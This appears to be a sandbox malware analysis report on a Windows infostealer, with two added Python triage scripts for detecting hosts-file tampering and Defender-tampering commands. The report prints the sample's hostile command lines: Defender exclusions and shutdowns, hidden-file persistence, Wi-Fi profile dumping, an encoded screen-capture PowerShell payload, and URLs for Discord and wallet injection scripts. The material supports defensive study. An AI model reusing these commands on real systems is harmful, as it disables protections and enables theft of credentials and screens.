Source: powershell.exe, 00000012.00000002.1726793119.000001FCA3582000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmp | String found in binary or memory: https://discord.com/api/v9/users/
Source: powershell.exe, 00000012.00000002.1665126840.000001FC94E1B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: SecurityHealthSystray.exe, 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmp | String found in binary or memory: https://github.com/hackirby/wallets-injection/raw/main/atomic.asarhttps://github.com/hackirby/wallet
Source: powershell.exe, 00000012.00000002.1665126840.000001FC94145000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: SecurityHealthSystray.exe, 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmp | String found in binary or memory: https://i.ibb.co/GFZ2tHJ/shakabaiano-1674282487.jpgJSON
Source: powershell.exe, 0000000C.00000002.1580104465.000001C995732000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1726793119.000001FCA36C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1665126840.000001FC94E76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1726793119.000001FCA3582000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000012.00000002.1665126840.000001FC94C75000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000012.00000002.1665126840.000001FC94C75000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.orgX
Source: SecurityHealthSystray.exe, 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmp | String found in binary or memory: https://raw.githubusercontent.com/hackirby/discord-injection/main/injection.js1157920892103562487626
Source: history.txt.0.dr | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match | File source: 22.2.SecurityHealthSystray.exe.280000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.SecurityHealthSystray.exe.280000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecurityHealthSystray.exe PID: 7388, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SecurityHealthSystray.exe PID: 3348, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File written: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | Process created: Commandline size = 3614
Source: classification engine | Classification label: mal100.troj.adwa.spyw.expl.evad.winEXE@38/25@2/2
Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:604:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7656:120:WilError_03
Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\3575651c-bb47-448e-a514-22865732bbc
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7468:120:WilError_03
Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File created: C:\Users\user\AppData\Local\Temp\browsers-temp
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: SecurityHealthSystray.exe, 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmp | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: SecurityHealthSystray.exe, 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: SecurityHealthSystray.exe, 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmp | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: SecurityHealthSystray.exe, 0000000D.00000002.1508066041.0000000000281000.00000040.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmp | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: WdlA0C4PkO.exe | ReversingLabs: Detection: 55%
Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | File read: C:\Users\user\Desktop\WdlA0C4PkO.exe
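Added example, not part of the Joe Sandbox report and not code from the sample: the report shows the sample reading and then writing C:\Windows\System32\drivers\etc\hosts, and its process tree runs attrib -r on that file right before the write and attrib +r right after, so an intact read-only attribute is no evidence the file is untouched. The Python below parses a hosts file the way a triage script would and reports every active mapping, labelling names pointed at 0.0.0.0 or a loopback address as sinkholes (the usual way a stealer blocks AV and update hosts) and anything else as a redirect. The hosts content is a constructed sample built from the stock Windows header plus injected entries using reserved .invalid names and a TEST-NET address; the report does not show what the sample actually wrote.

```python
import ipaddress

# Constructed sample of a tampered hosts file: the stock Windows header
# (comments only, as shipped) followed by injected mappings. Names and
# addresses are placeholders (.invalid, TEST-NET-3), not from the report.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
#	127.0.0.1       localhost
#	::1             localhost
0.0.0.0       av-updates.example.invalid
127.0.0.1     telemetry.example.invalid   # trailing comment is ignored
203.0.113.7   login.example-bank.invalid
::1           localhost
"""


def parse_hosts(text):
    """Yield (ip_address, hostname) for every active mapping.

    Comment lines, inline comments and lines whose first field is not an
    IP address are skipped, matching how the resolver treats the file.
    """
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            addr = ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # malformed line, not a mapping
        for name in fields[1:]:
            yield addr, name.lower()


def classify_hosts(text):
    """Return [(kind, ip, hostname)] for every non-default active mapping.

    A stock Windows hosts file contains only comments, so every active entry
    other than a loopback 'localhost' line is a deviation. Entries that point
    a name at 0.0.0.0 or loopback are 'sinkhole'; any other target address is
    a 'redirect' to an attacker-chosen host.
    """
    findings = []
    for addr, name in parse_hosts(text):
        if name == "localhost" and addr.is_loopback:
            continue
        kind = "sinkhole" if (addr.is_unspecified or addr.is_loopback) else "redirect"
        findings.append((kind, str(addr), name))
    return findings


if __name__ == "__main__":
    for kind, ip, name in classify_hosts(SAMPLE_HOSTS):
        print(f"{kind:9} {ip:15} {name}")
```

On a live host, pair the parse with the file's last-write time and the attrib history: the attrib -r / +r pair in the process tree is itself a better indicator than the file's attributes after the fact.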
Source: unknown | Process created: C:\Users\user\Desktop\WdlA0C4PkO.exe "C:\Users\user\Desktop\WdlA0C4PkO.exe"
Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | Process created: C:\Windows\System32\attrib.exe attrib +h +s C:\Users\user\Desktop\WdlA0C4PkO.exe
Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | Process created: C:\Windows\System32\attrib.exe attrib +h +s C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUID
Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\WdlA0C4PkO.exe
Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get Name
Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe "C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUID
Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQBzAHUAbAB0AHMALgBBAGQAZAAoACgAQgBpAHQAbQBhAHAAKQBiAGkAdABtAGEAcAAuAEMAbABvAG4AZQAoACkAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABT
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41CB.tmp" "c:\Users\user\AppData\Local\Temp\a12sgnvo\CSC12900879E4FA4A8799F1D0272636A686.TMP"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe "C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\WdlA0C4PkO.exe | Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
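Added example, not part of the Joe Sandbox report and not code from the sample: a small Python triage routine for the process tree above. It decodes a PowerShell -EncodedCommand blob (base64 over UTF-16LE, trimmed to whole base64 quads because a logged copy may be cut short, as the report's is), flags the Add-MpPreference exclusion and each Set-MpPreference switch that turns off a Defender capability, flags the -ExecutionPolicy Bypass and netsh wlan profile enumeration, and looks inside the decoded script for Add-Type and screen-capture calls. Decoding the report's own blob this way gives a C# class Screenshot that walks Screen.AllScreens and calls Graphics.CopyFromScreen for each monitor, followed by Add-Type -TypeDefinition $source -ReferencedAssemblies, where the report's copy ends; that Add-Type compile is what makes csc.exe and cvtres.exe appear as children of powershell.exe. Because the real blob is truncated, the example re-encodes a short constructed stand-in script with the same two traits, and the command lines it scans are copied from the process tree above plus one wmic line as a control.

```python
import base64
import re

# Constructed stand-in for the report's -EncodedCommand payload. The report's
# own blob is cut off, so a short script with the two traits that matter for
# triage (an Add-Type compile and a screen grab) is re-encoded here instead.
STANDIN_SCRIPT = (
    "Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing\r\n"
    "[Screenshot]::CaptureScreens()"
)
ENCODED = base64.b64encode(STANDIN_SCRIPT.encode("utf-16-le")).decode("ascii")

# Constructed sample: command lines as they appear in the process tree above,
# plus one wmic line that should produce no finding.
SAMPLE_CMDLINES = [
    "powershell -Command Add-MpPreference -ExclusionPath C:\\Users\\user\\Desktop\\WdlA0C4PkO.exe",
    "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true "
    "-DisableIOAVProtection $true -DisableRealtimeMonitoring $true "
    "-DisableScriptScanning $true -EnableControlledFolderAccess Disabled "
    "-EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled "
    "-SubmitSamplesConsent NeverSend",
    "netsh wlan show profiles",
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand " + ENCODED,
    "wmic csproduct get UUID",
]

# Set-MpPreference switches that each turn off one Defender capability
# (matched case-insensitively against the lowercased command line).
DEFENDER_TAMPER_FLAGS = {
    "-disablerealtimemonitoring": "real-time protection",
    "-disableioavprotection": "download and attachment scanning",
    "-disablescriptscanning": "script scanning",
    "-disableintrusionpreventionsystem": "network intrusion prevention",
    "-mapsreporting": "cloud (MAPS) reporting",
    "-submitsamplesconsent": "sample submission",
}


def decode_encoded_command(cmdline):
    """Return the plaintext of a PowerShell -EncodedCommand blob, or None.

    The blob is base64 over UTF-16LE, not UTF-8. A log line may truncate it,
    so the blob is trimmed to a multiple of four characters before decoding.
    """
    m = re.search(r"-(?:EncodedCommand|enc\w*)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    blob = m.group(1)
    blob = blob[: len(blob) - len(blob) % 4]
    return base64.b64decode(blob).decode("utf-16-le", errors="replace")


def triage(cmdline):
    """Classify one process command line into a list of finding tags."""
    findings = []
    low = cmdline.lower()
    if "add-mppreference" in low and "-exclusionpath" in low:
        findings.append("defender_exclusion_added")
    if "set-mppreference" in low:
        for flag, capability in DEFENDER_TAMPER_FLAGS.items():
            if flag in low:
                findings.append("defender_tamper:" + capability)
    if low.startswith("netsh") and "wlan" in low and "show profile" in low:
        findings.append("wifi_profile_enumeration")
    if "-executionpolicy bypass" in low:
        findings.append("execution_policy_bypass")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.append("encoded_command")
        # Add-Type compiles C# on the fly, which is why csc.exe and cvtres.exe
        # show up as children of powershell.exe in the process tree.
        if re.search(r"\badd-type\b", decoded, re.I):
            findings.append("inline_csharp_compile")
        if re.search(r"copyfromscreen|screenshot", decoded, re.I):
            findings.append("screen_capture")
    return findings


def triage_all(cmdlines):
    """Return [(cmdline, findings)] for every line that produced a finding."""
    results = []
    for cmdline in cmdlines:
        findings = triage(cmdline)
        if findings:
            results.append((cmdline, findings))
    return results


if __name__ == "__main__":
    for cmdline, findings in triage_all(SAMPLE_CMDLINES):
        print(cmdline[:72], "->", ", ".join(findings))
```

The tags are deliberately coarse; the point is that the encoded command has to be decoded before any content match can fire, and that a truncated blob still decodes far enough to classify, which is exactly the situation with the report's copy.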
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                      Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                      Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                      Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
